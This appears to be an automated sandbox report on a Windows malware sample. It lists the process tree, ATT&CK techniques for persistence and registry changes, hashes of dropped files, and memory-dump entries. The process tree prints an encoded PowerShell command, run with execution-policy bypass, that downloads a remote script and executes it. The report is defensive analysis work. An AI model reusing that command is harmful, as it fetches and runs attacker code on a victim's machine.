cmd.exe /C wmic CPU get NAME
1⤵
- Suspicious use of WriteProcessMemory
PID:4932

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
PID:4056

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2604

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5190.tmp
MD5
6e3c7b357f90d8b14092ce52576d2762

SHA1
4f424b3a2ac5f86b5a650b984d6920c3b829a9fb

SHA256
80dad56aca25de73f0ab2502cf3260f3662dac511a86306c0354f9a5ebaa0489

SHA512
ce33c98c9963465a708cc610d85de962c7849a4f11a2a1f539d160a6ada2fbf9f366982b683b63171b1796389a3ce31d4b4ce86d656eda4643f34ac8de133001

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
dac6b25db50155c0c78d5bf64fb95fa3

SHA1
9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d

SHA256
6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf

SHA512
679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip
MD5
7cac19b2868c41555db4b71219217f9b

SHA1
d6f77db578db3c5c572c3a944d9072ed00560dcb

SHA256
d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a

SHA512
5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.dll
MD5
36c38fa0e6665f7cac1a4adfc5678b3b

SHA1
36fa461bb4d7cd8eb3c49ba9619aec5e5f47ec3d

SHA256
9450b2dfe83775c359afe633bd8f05fd36732b127960776390606757e49848f4

SHA512
a51303a60aeccaa5e58712e0ed5e54e5bb511bc6794eae79560effb125d8c80881876bd85f3a06aec1c682ca62da83d8f559f9cc9db850c3e51ca6d24c2d148e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z2mm4oij\CSC275C1D5BBB7C49098089648E4E3A7A1A.TMP
MD5
8bdc8cf250970c8a0b92246776213531

SHA1
065e1ce138893080d6e4010cdbd1935100a39104

SHA256
91d1682e3c341c2d7151abc13f03aeb2481dd07b2261d302687635bef38244b4

SHA512
b1a2f5259909977ebb84cc286e99e87734e4d5a9e1a23c6d670610abbcbd516428d53bd4ec2d0e2f40bcdf26825dcd16738fc947b9b19617ceef0d6e68e150a8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.0.cs
MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.cmdline
MD5
8c80ff39bb32ddab61996a6d0f3d4256

SHA1
ab2bc98466fd5ca4be5e74222cf773efa27fda6b

SHA256
1d2a15739df0da92c093e35d3d11fb4fc1bcf45cced543e41fdba5766dc01975

SHA512
0207eced12d80d54c6b16e644de1ae4282aa998556895a1d3f2609303374ce32df3a4d56beea23440f88ad190b2514a0a89082ca0bd45baef91e9a32b91707a0

Download Submit
\Windows\Branding\mediasrv.png
MD5
eeb448ea2709c57b9ea2e223d0c79396

SHA1
38331dd027386151ee37a29a7820570a76427b02

SHA256
c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272

SHA512
c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

Download Submit
\Windows\Branding\mediasvc.png
MD5
bb873bd05a47f502ee4ed3c4ea749a4f

SHA1
e55a6bf49a4833fb9e9b123df39dac9bf507f75a

SHA256
a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a

SHA512
ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548

Download Submit
memory/184-36-0x0000000000000000-mapping.dmp

Download
memory/364-20-0x0000000000000000-mapping.dmp

Download
memory/500-17-0x0000000000000000-mapping.dmp

Download
memory/648-18-0x0000000000000000-mapping.dmp

Download
memory/688-44-0x0000000000000000-mapping.dmp

Download
memory/812-21-0x0000000000000000-mapping.dmp

Download
memory/904-19-0x0000000000000000-mapping.dmp

Download
memory/1056-22-0x0000000000000000-mapping.dmp

Download
memory/1216-23-0x0000000000000000-mapping.dmp

Download
memory/1316-41-0x0000000000000000-mapping.dmp

Download
memory/1332-38-0x0000000000000000-mapping.dmp

Download
memory/1404-24-0x0000000000000000-mapping.dmp

Download
memory/1412-25-0x0000000000000000-mapping.dmp

Download
memory/1492-26-0x0000000000000000-mapping.dmp

Download
memory/1584-27-0x0000000000000000-mapping.dmp

Download
memory/1764-7-0x0000000000000000-mapping.dmp

Download
memory/2240-30-0x0000000000000000-mapping.dmp

Download
memory/2376-31-0x0000000000000000-mapping.dmp

Download
memory/2536-32-0x0000000000000000-mapping.dmp

Download
memory/2572-40-0x0000000000000000-mapping.dmp

Download
memory/2604-45-0x0000000000000000-mapping.dmp

Download
memory/2604-46-0x00007FFBDEDD0000-0x00007FFBDF7BC000-memory.dmp

Filesize
9.9MB

Download
memory/2608-33-0x0000000000000000-mapping.dmp

Download
memory/2628-35-0x0000000000000000-mapping.dmp

Download
memory/3092-14-0x00000212820B0000-0x00000212820B1000-memory.dmp

Filesize
4KB

Download
memory/3092-2-0x0000000000000000-mapping.dmp

Download
memory/3092-3-0x00007FFBDEDD0000-0x00007FFBDF7BC000-memory.dmp

Filesize
9.9MB

Download
memory/3092-4-0x000002129A0D0000-0x000002129A0D1000-memory.dmp

Filesize
4KB

Download
memory/3092-5-0x000002129B160000-0x000002129B161000-memory.dmp

Filesize
4KB

Download
memory/4056-43-0x0000000000000000-mapping.dmp

Download
memory/4128-51-0x0000000000000000-mapping.dmp

Download
memory/4188-50-0x0000000000000000-mapping.dmp

Download
memory/4288-10-0x0000000000000000-mapping.dmp

Download
memory/4400-16-0x0000000000000000-mapping.dmp

Download
memory/4416-15-0x0000000000000000-mapping.dmp

Download
memory/4496-42-0x0000000000000000-mapping.dmp

Download
memory/4532-37-0x0000000000000000-mapping.dmp

Download
memory/4600-34-0x0000000000000000-mapping.dmp

Download
memory/4632-39-0x0000000000000000-mapping.dmp

Download
memory/4636-1-0x00000000018C0000-0x00000000018C1000-memory.dmp

Filesize
4KB

Download